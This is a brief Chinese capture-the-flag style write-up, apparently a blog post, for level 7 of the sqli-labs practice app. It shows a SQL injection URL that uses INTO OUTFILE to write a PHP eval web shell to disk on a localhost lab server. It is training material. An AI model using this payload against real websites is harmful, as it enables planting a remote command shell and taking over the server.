首页 > 代码库 > Sqli-LABS通关笔录-7[文件写入函数Outfile]
Sqli-LABS通关笔录-7[文件写入函数Outfile]
该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用。
通过源代码我们很容易的写出了payload。倘若我们一个个去尝试的话,说实话,不容易。
http://127.0.0.1/sql/Less-7/index.php?id=1‘)) and 1=1--+
Payload:
http://127.0.0.1/sql/Less-7/index.php?id=1‘)) union select 1,‘<?php eval($_POST[cmd])?>‘,3 into outfile ‘H://zhenxishaonianshi.txt‘--+
虽然提示了语法错误。但是我们看看。在H盘是真实的存在的。
THE END
Sqli-LABS通关笔录-7[文件写入函数Outfile]
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。